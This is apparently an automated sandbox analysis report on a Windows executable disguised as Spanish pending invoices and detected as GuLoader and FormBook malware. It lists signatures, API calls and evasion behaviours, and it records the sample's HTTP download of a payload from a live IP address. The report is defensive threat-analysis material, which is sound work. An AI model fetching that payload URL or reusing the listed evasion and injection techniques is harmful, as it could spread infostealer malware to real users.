Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe

Overview

General Information

Sample name:FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
Analysis ID:1587320
MD5:4f2c796aebd02a54ca9bebb0c5bc5ef0
SHA1:558e2f3de9077aaf9159c4fb1633d66c75b14dda
SHA256:c2f619460d6cd63ca1ae9b9abec61842fa05f09c0698fc4c400ccd5342109692
Infos:

Detection

FormBook, GuLoader
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.2382836731.0000000032150000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000000.00000002.2241540149.0000000004B8E000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-10T07:05:27.108954+010028032702Potentially Bad Traffic192.168.2.549740212.162.149.15380TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeVirustotal: Detection: 55%Perma Link
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeReversingLabs: Detection: 42%
      Yara detected FormBook
      Source: Yara matchFile source: 00000003.00000002.2382836731.0000000032150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: wntdll.pdbUGP source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2328835292.0000000032303000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2326959137.0000000032158000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2328835292.0000000032303000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2326959137.0000000032158000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_004066F4 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004066F4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_004065AA FindFirstFileW,FindClose,0_2_004065AA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_00402B75 FindFirstFileW,0_2_00402B75
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49740 -> 212.162.149.153:80
      Source: global trafficHTTP traffic detected: GET /iXjlIFhRzlkjbZPQm185.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.153Cache-Control: no-cache
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: global trafficHTTP traffic detected: GET /iXjlIFhRzlkjbZPQm185.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.153Cache-Control: no-cache
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361213238.0000000002448000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361213238.0000000002484000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361479520.00000000025C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.153/iXjlIFhRzlkjbZPQm185.bin
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361213238.0000000002448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binDfNN
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361213238.0000000002484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binT
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361213238.0000000002484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binY
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361213238.0000000002484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binm
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error...
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_00404B0B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404B0B

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000003.00000002.2382836731.0000000032150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325235C0 NtCreateMutant,LdrInitializeThunk,3_2_325235C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522B60 NtClose,LdrInitializeThunk,3_2_32522B60
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_32522C70
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_32522DF0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32523010 NtOpenDirectoryObject,3_2_32523010
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32523090 NtSetValueKey,3_2_32523090
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325239B0 NtGetContextThread,3_2_325239B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32523D70 NtOpenThread,3_2_32523D70
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32523D10 NtOpenProcessToken,3_2_32523D10
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32524340 NtSetContextThread,3_2_32524340
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32524650 NtSuspendThread,3_2_32524650
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522AD0 NtReadFile,3_2_32522AD0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522AF0 NtWriteFile,3_2_32522AF0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522AB0 NtWaitForSingleObject,3_2_32522AB0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522BF0 NtAllocateVirtualMemory,3_2_32522BF0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522BE0 NtQueryValueKey,3_2_32522BE0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522B80 NtQueryInformationFile,3_2_32522B80
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522BA0 NtEnumerateValueKey,3_2_32522BA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522E30 NtWriteVirtualMemory,3_2_32522E30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522EE0 NtQueueApcThread,3_2_32522EE0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522E80 NtReadVirtualMemory,3_2_32522E80
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522EA0 NtAdjustPrivilegesToken,3_2_32522EA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522F60 NtCreateProcessEx,3_2_32522F60
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522F30 NtCreateSection,3_2_32522F30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522FE0 NtCreateFile,3_2_32522FE0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522F90 NtProtectVirtualMemory,3_2_32522F90
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522FB0 NtResumeThread,3_2_32522FB0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522FA0 NtQuerySection,3_2_32522FA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522C60 NtCreateKey,3_2_32522C60
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522C00 NtQueryInformationProcess,3_2_32522C00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522CC0 NtQueryVirtualMemory,3_2_32522CC0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522CF0 NtOpenProcess,3_2_32522CF0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522CA0 NtQueryInformationToken,3_2_32522CA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522D10 NtMapViewOfSection,3_2_32522D10
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522D00 NtSetInformationFile,3_2_32522D00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522D30 NtUnmapViewOfSection,3_2_32522D30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522DD0 NtDelayExecution,3_2_32522DD0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522DB0 NtEnumerateKey,3_2_32522DB0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036D7
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_004043F90_2_004043F9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_004070FB0_2_004070FB
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_734723510_2_73472351
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250B2C03_2_3250B2C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325912ED3_2_325912ED
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F52A03_2_324F52A0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DD34C3_2_324DD34C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A132D3_2_325A132D
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3253739A3_2_3253739A
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C03_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259F0CC3_2_3259F0CC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A70E93_2_325A70E9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AF0E03_2_325AF0E0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325BB16B3_2_325BB16B
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3252516C3_2_3252516C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF1723_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324FB1B03_2_324FB1B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325356303_2_32535630
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A16CC3_2_325A16CC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AF7B03_2_325AF7B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E14603_2_324E1460
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AF43F3_2_325AF43F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A75713_2_325A7571
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B95C33_2_325B95C3
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258D5B03_2_3258D5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AFA493_2_325AFA49
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A7A463_2_325A7A46
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32563A6C3_2_32563A6C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259DAC63_2_3259DAC6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32535AA03_2_32535AA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258DAAC3_2_3258DAAC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32591AA33_2_32591AA3
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AFB763_2_325AFB76
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32565BF03_2_32565BF0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3252DBF93_2_3252DBF9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250FB803_2_3250FB80
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3255D8003_2_3255D800
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F38E03_2_324F38E0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250B9503_2_3250B950
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F99503_2_324F9950
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325859103_2_32585910
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F9EB03_2_324F9EB0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AFF093_2_325AFF09
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324B3FD23_2_324B3FD2
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324B3FD53_2_324B3FD5
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1F923_2_324F1F92
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AFFB13_2_325AFFB1
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32569C323_2_32569C32
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AFCF23_2_325AFCF2
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A1D5A3_2_325A1D5A
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F3D403_2_324F3D40
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A7D733_2_325A7D73
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250FDC03_2_3250FDC0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325902743_2_32590274
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325702C03_2_325702C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AA3523_2_325AA352
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B03E63_2_325B03E6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324FE3F03_2_324FE3F0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325820003_2_32582000
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325781583_2_32578158
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258A1183_2_3258A118
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E01003_2_324E0100
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A81CC3_2_325A81CC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B01AA3_2_325B01AA
